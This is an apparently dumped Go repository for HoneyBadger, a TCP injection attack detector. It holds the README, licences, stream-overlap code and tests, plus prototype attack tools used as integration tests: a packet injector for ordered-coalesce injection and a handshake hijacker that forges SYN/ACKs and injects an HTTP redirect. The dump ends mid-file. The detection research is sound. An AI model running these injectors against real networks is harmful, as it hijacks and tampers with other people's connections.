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Repository: david415/HoneyBadger
Branch: master
Commit: 53421ca0b08d
Files: 46
Total size: 221.4 KB
Directory structure:
gitextract_ovn09ehc/
├── .travis.yml
├── LICENSE
├── LICENSE_BSD
├── README.rst
├── attack/
│ └── injector.go
├── blocks/
│ ├── LICENSE
│ ├── blocks.go
│ └── blocks_test.go
├── cmd/
│ ├── handshakeHijacker/
│ │ └── main.go
│ ├── honeyBadger/
│ │ └── main.go
│ ├── honeybadgerReportTool/
│ │ ├── main.go
│ │ └── tcp_port_distribution.py
│ ├── honeybadgerReportToolColor/
│ │ └── main.go
│ ├── sprayInjector/
│ │ └── main.go
│ └── testBpfSniffer/
│ └── README
├── connection.go
├── connection_test.go
├── dispatcher.go
├── dispatcher_test.go
├── drivers/
│ ├── afpacket.go
│ ├── bpf.go
│ ├── libpcap.go
│ ├── pcapgo.go
│ └── register.go
├── go.mod
├── go.sum
├── logging/
│ ├── attack_logger.go
│ ├── metadata_attack_logger.go
│ ├── pcap_logger.go
│ ├── pcap_logger_test.go
│ ├── rotating_writer.go
│ └── util_test.go
├── ordered_coalesce.go
├── ordered_coalesce_test.go
├── pcap_integration_test.go
├── retrospective.go
├── retrospective_test.go
├── sniffer.go
├── supervisor.go
└── types/
├── events.go
├── flow.go
├── flow_test.go
├── packet_source.go
├── reassembly.go
├── ring.go
└── sequence.go
================================================
FILE CONTENTS
================================================
================================================
FILE: .travis.yml
================================================
language: go
go:
- "1.13"
before_install:
- sudo apt-get update -qq
- sudo apt-get install -y libpcap-dev
- git clone https://github.com/david415/honeybadger-pcap-files.git pcap_archive
install:
- go get -v -t ./
script:
- go test -v ./
- go test -v ./logging
- go test -v ./blocks
- go test -v ./types
================================================
FILE: LICENSE
================================================
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Program, unless a warranty or assumption of liability accompanies a
copy of the Program in return for a fee.
END OF TERMS AND CONDITIONS
How to Apply These Terms to Your New Programs
If you develop a new program, and you want it to be of the greatest
possible use to the public, the best way to achieve this is to make it
free software which everyone can redistribute and change under these terms.
To do so, attach the following notices to the program. It is safest
to attach them to the start of each source file to most effectively
state the exclusion of warranty; and each file should have at least
the "copyright" line and a pointer to where the full notice is found.
<one line to give the program's name and a brief idea of what it does.>
Copyright (C) <year> <name of author>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
Also add information on how to contact you by electronic and paper mail.
If the program does terminal interaction, make it output a short
notice like this when it starts in an interactive mode:
<program> Copyright (C) <year> <name of author>
This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
This is free software, and you are welcome to redistribute it
under certain conditions; type `show c' for details.
The hypothetical commands `show w' and `show c' should show the appropriate
parts of the General Public License. Of course, your program's commands
might be different; for a GUI interface, you would use an "about box".
You should also get your employer (if you work as a programmer) or school,
if any, to sign a "copyright disclaimer" for the program, if necessary.
For more information on this, and how to apply and follow the GNU GPL, see
<http://www.gnu.org/licenses/>.
The GNU General Public License does not permit incorporating your program
into proprietary programs. If your program is a subroutine library, you
may consider it more useful to permit linking proprietary applications with
the library. If this is what you want to do, use the GNU Lesser General
Public License instead of this License. But first, please read
<http://www.gnu.org/philosophy/why-not-lgpl.html>.
================================================
FILE: LICENSE_BSD
================================================
Copyright (c) 2012 Google, Inc. All rights reserved.
Copyright (c) 2009-2011 Andreas Krennmair. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer
in the documentation and/or other materials provided with the
distribution.
* Neither the name of Andreas Krennmair, Google, nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
================================================
FILE: README.rst
================================================
===========
HoneyBadger
===========
.. image:: http://honeybadger.readthedocs.org/en/latest/_images/honey_badger-white-sm-1.png
|
.. image:: https://travis-ci.org/david415/HoneyBadger.svg?branch=master
:target: https://travis-ci.org/david415/HoneyBadger
.. image:: https://coveralls.io/repos/github/david415/HoneyBadger/badge.svg?branch=master
:target: https://coveralls.io/github/david415/HoneyBadger
.. image:: https://godoc.org/github.com/david415/HoneyBadger?status.svg
:target: https://godoc.org/github.com/david415/HoneyBadger
project goals
-------------
* HoneyBadger is primarily a comprehensive TCP stream analysis tool for detecting and recording TCP injection attacks.
* This git repository also includes a variety of *prototype* TCP stream injections attacks.
details
-------
* Read about HoneyBadger's design and implementation: https://honeybadger.readthedocs.org/
* Read the `manual integration procedure`_ - a reproduciable procedure which proves HoneyBadger's TCP injection attack detection is reliable; **in less than 2 minutes you can perform a test on your loopback interface... and test that HoneyBadger can detect injected data into a netcat client-server connection.**
.. _manual integration procedure: https://honeybadger.readthedocs.org/en/latest/#manual-integration-test-with-netcat
* Read the godoc `autogenerated API documentation`_
.. _autogenerated API documentation: https://godoc.org/github.com/david415/HoneyBadger
* HoneyBadger currently support 3 Data AcQuisition packet sources: libpcap, AF_PACKET and BSD_BPF.
This means that for instance on OpenBSD, you must use the BSD_BPF DAQ by specifying this CLI option::
"-daq=BSD_BPF"
HoneyBadger attack detecton CLI examples!
-----------------------------------------
Build honeyBadger CLI command from source::
user@go-dev2:~/gopath/src/github.com/david415/HoneyBadger/cmd/honeyBadger$ go build
Run honeyBadger against a pcap file called tshark2.pcap::
user@go-dev2:~/gopath/src/github.com/david415/HoneyBadger/cmd/honeyBadger$ ./honeyBadger \
-max_concurrent_connections=1000 -max_pcap_log_size=100 -max_pcap_rotations=10 -max_ring_packets=40 \
-metadata_attack_log=false -total_max_buffer=1000 -connection_max_buffer=100 -archive_dir=./archive \
-log_packets -l=./incoming -pcapfile=./tshark2.pcap
honeyBadger will spew lots of things to stdout. Using the above command,
it will record an attack report JSON file(s) to the "./archive" directory.
Here's an example output with a pcap file containing an ordered coalesce injection::
2016/02/05 23:30:01 Starting libpcap packet capture on file ./tshark2.pcap
2016/02/05 23:30:01 connected 127.0.0.1:59670-127.0.0.1:9666
2016/02/05 23:30:01 race winner stream segment:
2016/02/05 23:30:01 00000000 20 69 73 20 6e 65 63 65 73 73 61 72 79 20 66 6f | is necessary fo|
00000010 72 20 61 6e 20 6f 70 65 6e 20 73 6f 63 69 65 74 |r an open societ|
00000020 79 20 69 6e 20 74 68 65 20 65 6c 65 63 74 72 6f |y in the electro|
00000030 6e 69 63 20 61 67 65 2e 20 50 72 69 76 61 63 79 |nic age. Privacy|
00000040 20 69 73 20 6e 6f 74 20 73 65 63 72 65 63 79 2e | is not secrecy.|
00000050 20 41 20 70 72 69 76 61 74 65 20 6d 61 74 74 65 | A private matte|
00000060 72 20 69 73 20 73 6f 6d 65 74 68 69 6e 67 20 6f |r is something o|
00000070 6e 65 20 64 6f 65 73 6e 27 74 20 77 61 6e 74 20 |ne doesn't want |
00000080 74 68 65 20 77 68 6f 6c 65 20 77 6f 72 6c 64 20 |the whole world |
00000090 74 6f 20 6b 6e 6f 77 2c 20 62 75 74 20 61 20 73 |to know, but a s|
000000a0 65 63 72 65 74 20 6d 61 74 74 65 72 20 69 73 20 |ecret matter is |
000000b0 73 6f 6d 65 74 68 69 6e 67 20 6f 6e 65 20 64 6f |something one do|
000000c0 65 73 6e 27 74 20 77 61 6e 74 20 61 6e 79 62 6f |esn't want anybo|
000000d0 64 79 20 74 6f 20 6b 6e 6f 77 2e 20 50 72 69 76 |dy to know. Priv|
000000e0 61 63 79 20 69 73 20 74 68 65 20 70 6f 77 65 72 |acy is the power|
000000f0 20 74 6f 20 73 65 6c 65 63 74 69 76 65 6c 79 20 | to selectively |
00000100 72 65 76 65 61 6c 20 6f 6e 65 73 65 6c 66 20 74 |reveal oneself t|
00000110 6f 20 74 68 65 20 77 6f 72 6c 64 2e |o the world.|
2016/02/05 23:30:01 race loser stream segment:
2016/02/05 23:30:01 00000000 50 72 69 76 61 63 79 20 69 73 20 6e 65 63 65 73 |Privacy is neces|
00000010 73 61 72 79 20 66 6f 72 20 61 6e 20 6f 70 65 6e |sary for an open|
00000020 20 73 6f 63 69 65 74 79 20 69 6e 20 74 68 65 20 | society in the |
00000030 65 6c 65 63 74 72 6f 6e 69 63 20 61 67 65 2e 20 |electronic age. |
00000040 50 72 69 76 61 63 79 20 69 73 20 6e 6f 74 20 73 |Privacy is not s|
00000050 65 63 72 65 63 79 2e 20 41 20 70 72 69 76 61 74 |ecrecy. A privat|
00000060 65 20 6d 61 74 74 65 72 20 69 73 20 73 6f 6d 65 |e matter is some|
00000070 74 68 69 6e 67 20 6f 6e 65 20 64 6f 65 73 6e 27 |thing one doesn'|
00000080 74 20 77 61 6e 74 20 74 68 65 20 77 68 6f 6c 65 |t want the whole|
00000090 20 77 6f 72 6c 64 20 74 6f 20 6b 6e 6f 77 2c 20 | world to know, |
000000a0 62 75 74 20 61 20 73 65 63 72 65 74 20 6d 61 74 |but a secret mat|
000000b0 74 65 72 20 69 73 20 73 6f 6d 65 74 68 69 6e 67 |ter is something|
000000c0 20 6f 6e 65 20 64 6f 65 73 6e 27 74 20 77 61 6e | one doesn't wan|
000000d0 74 20 61 6e 79 62 6f 64 79 20 74 6f 20 6b 6e 6f |t anybody to kno|
000000e0 77 2e 20 50 72 69 76 61 63 79 20 69 73 20 74 68 |w. Privacy is th|
000000f0 65 20 70 6f 77 65 72 20 74 6f 20 73 65 6c 65 63 |e power to selec|
00000100 74 69 76 65 6c 79 20 72 65 76 65 61 6c 20 6f 6e |tively reveal on|
00000110 65 73 65 6c 66 20 74 6f 20 74 68 65 |eself to the|
2016/02/05 23:30:01 detected an ordered coalesce injection
2016/02/05 23:30:01 FIN-WAIT-1: non-ACK packet received.
2016/02/05 23:30:01 ReadPacketData got EOF
2016/02/05 23:30:01 Close()
2016/02/05 23:30:01 1 connection(s) closed.
2016/02/05 23:30:01 Supervisor.Stopped()
2016/02/05 23:30:01 graceful shutdown: packet-source stopped
Or instead you can tell honeyBadger to analyze the wire with Linux's AF_PACKET capture mode. You
should first disable offloading::
sudo apt-get install ethtool
sudo ethtool -K eth0 gso off
sudo ethtool -K eth0 tso off
sudo ethtool -K eth0 gro off
And then run honeyBadger like this::
./honeyBadger -max_concurrent_connections=1000 -max_pcap_log_size=100 -max_pcap_rotations=10 \
-max_ring_packets=40 -metadata_attack_log=false -total_max_buffer=1000 -connection_max_buffer=100 \
-archive_dir=/home/user/gopath/src/github.com/david415/HoneyBadger/cmd/honeyBadger/archive -log_packets \
-l=/home/user/gopath/src/github.com/david415/HoneyBadger/cmd/honeyBadger/incoming -log_packets=true \
-i=eth0 -daq=AF_PACKET
2016/02/07 14:16:32 HoneyBadger: comprehensive TCP injection attack detection.
2016/02/07 14:16:32 PageCache: created 1024 new pages
2016/02/07 14:16:32 Starting AF_PACKET packet capture on interface eth0
Linux security note
-------------------
If running on Linux you can avoid running as root by using the setcap command.
In Linux you can run packet capture tools as an unprivileged user after you run setcap as root like this::
# setcap cap_net_raw,cap_net_admin=eip honeyBadger
BSD security note
-----------------
When using the ``BSD_BPF`` sniffer, avoid running as root by making sure your user has
read-write access to ``/dev/bpf*`` If you are in the ``wheel`` group and the bpf devices
are group owned by ``wheel`` then this should work::
# chmod g+rw /dev/bpf*
=======
license
=======
HoneyBadger is free software made available via the GPL3... except for small sections of code which are BSD licensed.
=======
contact
=======
* email dstainton415@gmail.com
* gpg key ID 0x836501BE9F27A723
* gpg fingerprint F473 51BD 87AB 7FCF 6F88 80C9 8365 01BE 9F27 A723
================================================
FILE: attack/injector.go
================================================
/*
* injector.go - TCP stream injector API - "integration tests" for HoneyBadger
* Copyright (C) 2014, 2015 David Stainton
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
package attack
import (
"github.com/david415/HoneyBadger/types"
"github.com/google/gopacket"
"github.com/google/gopacket/layers"
"github.com/google/gopacket/pcap"
"net"
"log"
)
type TCPStreamInjector struct {
packetConn net.PacketConn
pcapHandle *pcap.Handle
eth *layers.Ethernet
dot1q *layers.Dot1Q
ipv4 layers.IPv4
ipv6 layers.IPv6
tcp layers.TCP
ipBuf gopacket.SerializeBuffer
Payload gopacket.Payload
isIPv6Mode bool
}
func NewTCPStreamInjector(pcapHandle *pcap.Handle, isIPv6Mode bool) *TCPStreamInjector {
t := TCPStreamInjector{
pcapHandle: pcapHandle,
isIPv6Mode: isIPv6Mode,
}
return &t
}
func (i *TCPStreamInjector) SetEthernetLayer(eth *layers.Ethernet) {
i.eth = eth
}
func (i *TCPStreamInjector) SetIPv4Layer(iplayer layers.IPv4) {
i.ipv4 = iplayer
}
func (i *TCPStreamInjector) SetIPv6Layer(iplayer layers.IPv6) {
i.ipv6 = iplayer
}
func (i *TCPStreamInjector) SetTCPLayer(tcpLayer layers.TCP) {
i.tcp = tcpLayer
}
func (i *TCPStreamInjector) SpraySequenceRangePackets(start uint32, count int) error {
var err error
currentSeq := types.Sequence(start)
stopSeq := currentSeq.Add(count)
for ; currentSeq.Difference(stopSeq) != 0; currentSeq = currentSeq.Add(1) {
i.tcp.Seq = uint32(currentSeq)
err = i.Write()
if err != nil {
return err
}
}
return nil
}
// SprayFutureAndFillGapPackets is used to perform an ordered coalesce injection attack;
// that is we first inject packets with future sequence numbers and then we fill the gap.
// The gap being the range from state machine's "next Sequence" to the earliest Sequence we
// transmitted in our future sequence series of packets.
func (i *TCPStreamInjector) SprayFutureAndFillGapPackets(start uint32, gap_payload, attack_payload []byte, overlap_future_packet bool) error {
var err error = nil
// send future packet
nextSeq := types.Sequence(start)
i.tcp.Seq = uint32(nextSeq.Add(len(gap_payload)))
i.Payload = attack_payload
err = i.Write()
if err != nil {
return err
}
if overlap_future_packet == true {
// overlapping future injection
i.tcp.Seq = uint32(nextSeq.Add(len(gap_payload) + 7))
i.Payload = attack_payload
err = i.Write()
if err != nil {
return err
}
}
// fill in gap
i.tcp.Seq = start
i.Payload = gap_payload
err = i.Write()
if err != nil {
return err
}
return nil
}
func (i *TCPStreamInjector) Write() error {
log.Print("Write")
var err error = nil
if i.isIPv6Mode {
// XXX
i.tcp.SetNetworkLayerForChecksum(&i.ipv6)
} else {
i.tcp.SetNetworkLayerForChecksum(&i.ipv4)
}
packetBuf := gopacket.NewSerializeBuffer()
if i.isIPv6Mode {
opts := gopacket.SerializeOptions{
FixLengths: true,
ComputeChecksums: true,
}
err = gopacket.SerializeLayers(packetBuf, opts, i.eth, &i.ipv6, &i.tcp, i.Payload)
if err != nil {
log.Print("wtf. failed to encode ipv6 packet")
return err
}
} else {
opts := gopacket.SerializeOptions{
FixLengths: true,
ComputeChecksums: true,
}
err = gopacket.SerializeLayers(packetBuf, opts, i.eth, &i.ipv4, &i.tcp, i.Payload)
if err != nil {
log.Print("wtf. failed to encode ipv4 packet")
return err
}
}
if err := i.pcapHandle.WritePacketData(packetBuf.Bytes()); err != nil {
log.Printf("Failed to send packet: %s\n", err)
return err
}
return err
}
================================================
FILE: blocks/LICENSE
================================================
GNU GENERAL PUBLIC LICENSE
Version 2, June 1991
Copyright (C) 1989, 1991 Free Software Foundation, Inc., <http://fsf.org/>
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
Everyone is permitted to copy and distribute verbatim copies
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Preamble
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The precise terms and conditions for copying, distribution and
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address new problems or concerns.
Each version is given a distinguishing version number. If the Program
specifies a version number of this License which applies to it and "any
later version", you have the option of following the terms and conditions
either of that version or of any later version published by the Free
Software Foundation. If the Program does not specify a version number of
this License, you may choose any version ever published by the Free Software
Foundation.
10. If you wish to incorporate parts of the Program into other free
programs whose distribution conditions are different, write to the author
to ask for permission. For software which is copyrighted by the Free
Software Foundation, write to the Free Software Foundation; we sometimes
make exceptions for this. Our decision will be guided by the two goals
of preserving the free status of all derivatives of our free software and
of promoting the sharing and reuse of software generally.
NO WARRANTY
11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN
OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS
TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE
PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
REPAIR OR CORRECTION.
12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES.
END OF TERMS AND CONDITIONS
How to Apply These Terms to Your New Programs
If you develop a new program, and you want it to be of the greatest
possible use to the public, the best way to achieve this is to make it
free software which everyone can redistribute and change under these terms.
To do so, attach the following notices to the program. It is safest
to attach them to the start of each source file to most effectively
convey the exclusion of warranty; and each file should have at least
the "copyright" line and a pointer to where the full notice is found.
{description}
Copyright (C) {year} {fullname}
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License along
with this program; if not, write to the Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
Also add information on how to contact you by electronic and paper mail.
If the program is interactive, make it output a short notice like this
when it starts in an interactive mode:
Gnomovision version 69, Copyright (C) year name of author
Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
This is free software, and you are welcome to redistribute it
under certain conditions; type `show c' for details.
The hypothetical commands `show w' and `show c' should show the appropriate
parts of the General Public License. Of course, the commands you use may
be called something other than `show w' and `show c'; they could even be
mouse-clicks or menu items--whatever suits your program.
You should also get your employer (if you work as a programmer) or your
school, if any, to sign a "copyright disclaimer" for the program, if
necessary. Here is a sample; alter the names:
Yoyodyne, Inc., hereby disclaims all copyright interest in the program
`Gnomovision' (which makes passes at compilers) written by James Hacker.
{signature of Ty Coon}, 1 April 1989
Ty Coon, President of Vice
This General Public License does not permit incorporating your program into
proprietary programs. If your program is a subroutine library, you may
consider it more useful to permit linking proprietary applications with the
library. If this is what you want to do, use the GNU Lesser General
Public License instead of this License.
================================================
FILE: blocks/blocks.go
================================================
// code borrowed from https://github.com/zond/qisniff
// it's GPL2 see LICENSE
// modified to use our Sequence type instead of int64
// Package blocks contains logic to detect overlap between segments of a contiguous data stream.
package blocks
import (
"fmt"
"github.com/david415/HoneyBadger/types"
"strings"
)
type Block struct {
A, B types.Sequence
}
type BlockSegment struct {
Block Block
Bytes []byte
IsCoalesce bool
IsCoalesceGap bool
}
func (t BlockSegment) String() string {
return fmt.Sprintf("%s, Bytes %x, IsCoalesce %v, IsCoalesceGap %v", t.Block, t.Bytes, t.IsCoalesce, t.IsCoalesceGap)
}
func (t Block) String() string {
return fmt.Sprintf("Block(%d, %d)", t.A, t.B)
}
func (blk Block) Overlap(a, b types.Sequence) *Block {
left := a
if blk.A.GreaterThan(left) {
left = blk.A
}
right := b
if blk.B.LessThan(right) {
right = blk.B
}
if right.GreaterThan(left) {
return &Block{left, right}
}
return nil
}
type Blocks []Block
func (t Blocks) String() string {
acc := make([]string, 1)
for i := 0; i < t.Len(); i++ {
acc = append(acc, t[i].String())
}
return strings.Join(acc, "\n")
}
func (blks Blocks) Len() int {
return len(blks)
}
func (blks Blocks) Less(i, j int) bool {
return blks[i].A.LessThan(blks[j].A)
}
func (blks Blocks) Swap(i, j int) {
blks[i], blks[j] = blks[j], blks[i]
}
func (blks Blocks) Overlaps(a, b types.Sequence) Blocks {
var result Blocks
for _, blk := range blks {
if overlap := blk.Overlap(a, b); overlap != nil {
result = append(result, *overlap)
}
}
return result
}
func (blks Blocks) Add(a, b types.Sequence) Blocks {
var result Blocks
index := 0
added := false
for index < len(blks) {
blk := blks[index]
if a.LessThanOrEqual(blk.A) {
if b.LessThan(blk.A) {
result = append(result, Block{a, b})
result = append(result, blks[index:]...)
return result
} else if b.Equals(blk.A) {
result = append(result, Block{a, blk.B})
result = append(result, blks[index+1:]...)
return result
} else if b.GreaterThan(blk.A) {
if b.LessThanOrEqual(blk.B) {
result = append(result, Block{a, blk.B})
result = append(result, blks[index+1:]...)
return result
} else if b.GreaterThan(blk.B) {
index++
}
}
} else if a.GreaterThan(blk.A) {
if a.LessThanOrEqual(blk.B) {
if b.LessThanOrEqual(blk.B) {
result = append(result, blks[index:]...)
return result
} else if b.GreaterThan(blk.B) {
a = blk.A
index++
}
} else if a.GreaterThan(blk.B) {
result = append(result, blk)
index++
}
}
}
if !added {
result = append(result, Block{a, b})
}
return result
}
================================================
FILE: blocks/blocks_test.go
================================================
package blocks
import "testing"
import "github.com/david415/HoneyBadger/types"
func checkBlocks(t *testing.T, got, want Blocks) {
if len(got) != len(want) {
t.Errorf("Got %+v, want %+v", got, want)
return
}
for index, blk := range got {
o := want[index]
if blk.A.Difference(o.A) != 0 || blk.B.Difference(o.B) != 0 {
t.Errorf("Got %+v, want %+v", got, want)
return
}
}
}
func TestAdd(t *testing.T) {
blks := Blocks{}
blks = blks.Add(types.Sequence(50), types.Sequence(100))
checkBlocks(t, blks, Blocks{{types.Sequence(50), types.Sequence(100)}})
blks = blks.Add(types.Sequence(150), types.Sequence(200))
checkBlocks(t, blks, Blocks{{types.Sequence(50), types.Sequence(100)}, {types.Sequence(150), types.Sequence(200)}})
blks = blks.Add(types.Sequence(0), types.Sequence(40))
checkBlocks(t, blks, Blocks{{types.Sequence(0), types.Sequence(40)}, {types.Sequence(50), types.Sequence(100)}, {types.Sequence(150), types.Sequence(200)}})
blks = blks.Add(types.Sequence(40), types.Sequence(50))
checkBlocks(t, blks, Blocks{{types.Sequence(0), types.Sequence(100)}, {types.Sequence(150), types.Sequence(200)}})
blks = blks.Add(types.Sequence(75), types.Sequence(120))
checkBlocks(t, blks, Blocks{{types.Sequence(0), types.Sequence(120)}, {types.Sequence(150), types.Sequence(200)}})
blks = blks.Add(types.Sequence(110), types.Sequence(150))
checkBlocks(t, blks, Blocks{{types.Sequence(0), types.Sequence(200)}})
blks = blks.Add(types.Sequence(250), types.Sequence(300))
checkBlocks(t, blks, Blocks{{types.Sequence(0), types.Sequence(200)}, {types.Sequence(250), types.Sequence(300)}})
blks = blks.Add(types.Sequence(240), types.Sequence(300))
checkBlocks(t, blks, Blocks{{types.Sequence(0), types.Sequence(200)}, {types.Sequence(240), types.Sequence(300)}})
blks = blks.Add(types.Sequence(200), types.Sequence(210))
checkBlocks(t, blks, Blocks{{types.Sequence(0), types.Sequence(210)}, {types.Sequence(240), types.Sequence(300)}})
}
func TestOverlaps(t *testing.T) {
blks := Blocks{}
blks = blks.Add(types.Sequence(0), types.Sequence(100))
blks = blks.Add(types.Sequence(110), types.Sequence(200))
checkBlocks(t, blks.Overlaps(types.Sequence(50), types.Sequence(150)), Blocks{{types.Sequence(50), types.Sequence(100)}, {types.Sequence(110), types.Sequence(150)}})
checkBlocks(t, blks.Overlaps(types.Sequence(110), types.Sequence(220)), Blocks{{types.Sequence(110), types.Sequence(200)}})
}
================================================
FILE: cmd/handshakeHijacker/main.go
================================================
/*
* TCP handshake hijack implementation
* Copyright (C) 2014, 2015 David Stainton
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
package main
import (
"flag"
"github.com/david415/HoneyBadger/attack"
"github.com/google/gopacket"
"github.com/google/gopacket/examples/util"
"github.com/google/gopacket/layers"
"github.com/google/gopacket/pcap"
"github.com/google/gopacket/tcpassembly"
"log"
"math/rand"
"net"
"time"
)
var iface = flag.String("i", "lo", "Interface to get packets from")
var filter = flag.String("f", "tcp and dst port 9666 and tcp[tcpflags] == tcp-syn", "BPF filter for pcap")
var snaplen = flag.Int("s", 65536, "SnapLen for pcap packet capture")
var serviceIPstr = flag.String("d", "127.0.0.1", "target TCP flows from this IPv4 or IPv6 address")
var servicePort = flag.Int("e", 9666, "target TCP flows from this port")
func main() {
defer util.Run()()
var eth layers.Ethernet
var dot1q layers.Dot1Q
var ip4 layers.IPv4
var ip6 layers.IPv6
var tcp layers.TCP
var payload gopacket.Payload
r := rand.New(rand.NewSource(time.Now().UnixNano()))
hijackSeq := r.Uint32()
decoded := make([]gopacket.LayerType, 0, 4)
handle, err := pcap.OpenLive(*iface, int32(*snaplen), true, pcap.BlockForever)
if err != nil {
log.Fatal("error opening pcap handle: ", err)
}
ipv6_mode := false
serviceIP := net.ParseIP(*serviceIPstr)
if serviceIP.To4() == nil {
log.Print("using ipv6 mode")
ipv6_mode = true
} else {
log.Print("using ipv4 mode")
}
streamInjector := attack.NewTCPStreamInjector(handle, ipv6_mode)
if err := handle.SetBPFFilter(*filter); err != nil {
log.Fatal("error setting BPF filter: ", err)
}
parser := gopacket.NewDecodingLayerParser(layers.LayerTypeEthernet,
ð, &dot1q, &ip4, &ip6, &tcp, &payload)
log.Print("collecting packets...\n")
for {
log.Print("before ReadPacketData")
data, ci, err := handle.ReadPacketData()
log.Print("after ReadPacketData")
if err != nil {
log.Printf("error getting packet: %v %v", err, ci)
continue
}
err = parser.DecodeLayers(data, &decoded)
if err != nil {
log.Printf("error decoding packet: %v", err)
continue
}
log.Printf("got packet of len %d", len(data))
// craft a response to the client
// here we reuse the client's header
// by swapping addrs and ports
// swap ip addrs
srcip := ip4.SrcIP
ip4.SrcIP = ip4.DstIP
ip4.DstIP = srcip
// swap ports
srcport := tcp.SrcPort
tcp.SrcPort = tcp.DstPort
tcp.DstPort = srcport
// empty payload for SYN/ACK handshake completion
streamInjector.Payload = []byte("")
seq := tcp.Seq
tcp.Seq = hijackSeq
tcp.Ack = uint32(tcpassembly.Sequence(seq).Add(1))
tcp.ACK = true
tcp.SYN = true
tcp.RST = false
streamInjector.SetEthernetLayer(ð)
if ipv6_mode {
streamInjector.SetIPv6Layer(ip6)
} else {
streamInjector.SetIPv4Layer(ip4)
}
streamInjector.SetTCPLayer(tcp)
log.Print("before panic be here now")
err = streamInjector.Write()
if err != nil {
panic(err)
}
log.Print("SYN/ACK packet sent!\n")
// send rediction payload
redirect := []byte("HTTP/1.1 307 Temporary Redirect\r\nLocation: http://127.0.0.1/?\r\n\r\n")
streamInjector.Payload = redirect
tcp.PSH = true
tcp.SYN = false
tcp.ACK = true
tcp.Ack = uint32(tcpassembly.Sequence(seq).Add(1))
tcp.Seq = uint32(tcpassembly.Sequence(hijackSeq).Add(1))
if ipv6_mode {
streamInjector.SetIPv6Layer(ip6)
} else {
streamInjector.SetIPv4Layer(ip4)
}
streamInjector.SetTCPLayer(tcp)
err = streamInjector.Write()
if err != nil {
panic(err)
}
log.Print("redirect packet sent!\n")
// send FIN
streamInjector.Payload = []byte("")
